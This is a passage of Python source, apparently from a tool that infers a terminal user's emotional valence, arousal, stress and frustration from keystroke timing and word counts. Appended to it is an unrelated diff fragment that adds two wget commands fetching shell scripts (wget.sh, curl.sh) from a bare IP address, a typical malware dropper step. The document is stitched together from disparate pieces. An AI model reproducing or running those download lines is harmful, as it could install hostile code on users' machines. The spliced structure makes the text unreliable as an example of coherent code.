    Pure ratio over the lexical counters built in G.0:
    * ``positive`` — ``positive_lex_hits > negative_lex_hits +
      obscenity_hits`` AND ``positive_lex_hits ≥ VALENCE_MIN_HITS`` (2).
    * ``negative`` — ``negative_lex_hits + obscenity_hits >
      positive_lex_hits`` AND that sum ≥ ``VALENCE_MIN_HITS``.
    * ``neutral`` — fall-through.
    Skip emission below ``VALENCE_MIN_TYPED_CHARS`` (80) typed letters.
    Confidence hard-capped at 0.50 (registry convention); 0.30 below
    ``VALENCE_FULL_CONFIDENCE_MIN`` (200).
    """
    if ctx.typed_letter_count < VALENCE_MIN_TYPED_CHARS:
        return
    pos = ctx.positive_lex_hits
    neg_total = ctx.negative_lex_hits + ctx.obscenity_hits
    if pos > neg_total and pos >= VALENCE_MIN_HITS:
        value = "positive"
    elif neg_total > pos and neg_total >= VALENCE_MIN_HITS:
        value = "negative"
    else:
        value = "neutral"
    raw = 0.50 if ctx.typed_letter_count >= VALENCE_FULL_CONFIDENCE_MIN else 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.valence",
        value=value,
        confidence=_cap_soft(raw),
    )
 def arousal(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.arousal`` ∈ {low_calm, medium_engaged,
    high_agitated}.
    Three signals (any of which fires ``high_agitated``):
    * ``ctx.caps_run_max ≥ AROUSAL_CAPS_RUN_MIN`` (5) — capslock rant.
    * ``ctx.bang_run_max ≥ AROUSAL_BANG_RUN_MIN`` (3) — repeated bangs.
    * The fastest typing burst's median IAT < ``AROUSAL_FAST_IAT_S``
      (0.06) over a burst of ≥ ``AROUSAL_MIN_IATS`` (30) IATs.
    ``low_calm`` — slowest qualifying burst's median IAT >
    ``AROUSAL_CALM_IAT_S`` (0.30).
    ``medium_engaged`` — fall-through.
    Skip emission when no qualifying typing bursts. Confidence hard-
    capped at 0.50; 0.30 below ``AROUSAL_MIN_IATS`` total typed IATs.
    """
    qualifying = [b for b in ctx.typing_bursts if len(b) >= 3]
    if not qualifying:
        return
    fastest_med = min(statistics.median(b) for b in qualifying)
    slowest_med = max(statistics.median(b) for b in qualifying)
    total_iats = sum(len(b) for b in qualifying)
    if (
        ctx.caps_run_max >= AROUSAL_CAPS_RUN_MIN
        or ctx.bang_run_max >= AROUSAL_BANG_RUN_MIN
        or (
            total_iats >= AROUSAL_MIN_IATS
            and fastest_med < AROUSAL_FAST_IAT_S
        )
    ):
        value = "high_agitated"
    elif total_iats >= AROUSAL_MIN_IATS and slowest_med > AROUSAL_CALM_IAT_S:
        value = "low_calm"
    else:
        value = "medium_engaged"
    raw = 0.50 if total_iats >= AROUSAL_MIN_IATS else 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.arousal",
        value=value,
        confidence=_cap_soft(raw),
    )
 def stress_response(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.stress_response`` ∈ {none,
    eustress_positive, distress_negative}.
    Compare typing speed *after* an errored command vs the session
    baseline:
    * For each errored command at index ``i``, gather
      ``ctx.intra_command_iats[i+1]`` — the response command's intra-
      command IATs.
    * Baseline: median of all intra-command IATs from commands NOT
      immediately following an errored command.
    Verdict by ratio of post-error / baseline:
    * ratio ≥ ``STRESS_EUSTRESS_RATIO_MIN`` (1.20) → ``eustress_positive``
      (slowed down — recovered, deliberate).
    * ratio ≤ ``1 / STRESS_DISTRESS_RATIO_MIN`` → ``distress_negative``
      (sped up — anxious, mashing keys).
    * otherwise → ``none``.
    Skip emission when no commands. Confidence hard-capped at 0.50;
    0.30 below ``STRESS_MIN_ERRORED_WITH_IATS`` (2) errored commands
    with non-empty post-error IAT data.
    """
    if not ctx.commands:
        return
    post_error_iats: list[float] = []
    baseline_iats: list[float] = []
    n = len(ctx.commands)
    qualifying_errored = 0
    for i, cmd in enumerate(ctx.commands):
        is_post_error = i > 0 and ctx.commands[i - 1].errored
        iats = list(ctx.intra_command_iats[i]) if i < len(ctx.intra_command_iats) else []
        if is_post_error:
            if iats:
                qualifying_errored += 1
                post_error_iats.extend(iats)
        else:
            baseline_iats.extend(iats)
        # mypy: silence unused-var on n / cmd (kept for clarity)
        _ = (n, cmd)
    if not post_error_iats or not baseline_iats:
        value = "none"
    else:
        med_post = statistics.median(post_error_iats)
        med_base = statistics.median(baseline_iats)
        if med_base <= 0.0:
            value = "none"
        else:
            ratio = med_post / med_base
            if ratio >= STRESS_EUSTRESS_RATIO_MIN:
                value = "eustress_positive"
            elif ratio <= 1.0 / STRESS_DISTRESS_RATIO_MIN:
                value = "distress_negative"
            else:
                value = "none"
    raw = 0.50 if qualifying_errored >= STRESS_MIN_ERRORED_WITH_IATS else 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.stress_response",
        value=value,
        confidence=_cap_soft(raw),
    )
 def frustration_venting(ctx: SessionContext) -> Iterator[Observation]:
    """Emit ``emotional_valence.frustration_venting`` ∈ {none, detected}.
    Pure read of ``ctx.obscenity_hits`` (G.0 lexical counter):
    * ``detected`` — ``obscenity_hits ≥ 1``.
    * ``none`` — zero hits.
    Skip emission below ``FRUST_VENT_MIN_TYPED_CHARS`` (30) typed
    letters — too thin to call cleanly absent. Confidence hard-capped
    at 0.50; 0.40 when ``detected``; 0.50 only when ``none`` AND
    typed_letter_count ≥ ``FRUST_VENT_FULL_CONFIDENCE_MIN`` (200);
    0.30 otherwise.
    """
    if ctx.typed_letter_count < FRUST_VENT_MIN_TYPED_CHARS:
        return
    if ctx.obscenity_hits >= 1:
        value = "detected"
        raw = 0.40
    else:
        value = "none"
        if ctx.typed_letter_count >= FRUST_VENT_FULL_CONFIDENCE_MIN:
            raw = 0.50
        else:
            raw = 0.30
    yield make_observation(
        ctx,
        primitive="emotional_valence.frustration_venting",
        value=value,
        confidence=_cap_soft(raw),
    )
--- a/Show More
+++ b/Show More
		`@@ -0,0 +1,3 @@`
							`wget http://31.56.209.39/wget.sh -o wget.sh`

							`wget http://31.56.209.39/curl.sh -o curl.sh`
		`@@ -0,0 +1 @@`
							`"""Artifact storage helpers shared between the web router and TTP workers."""`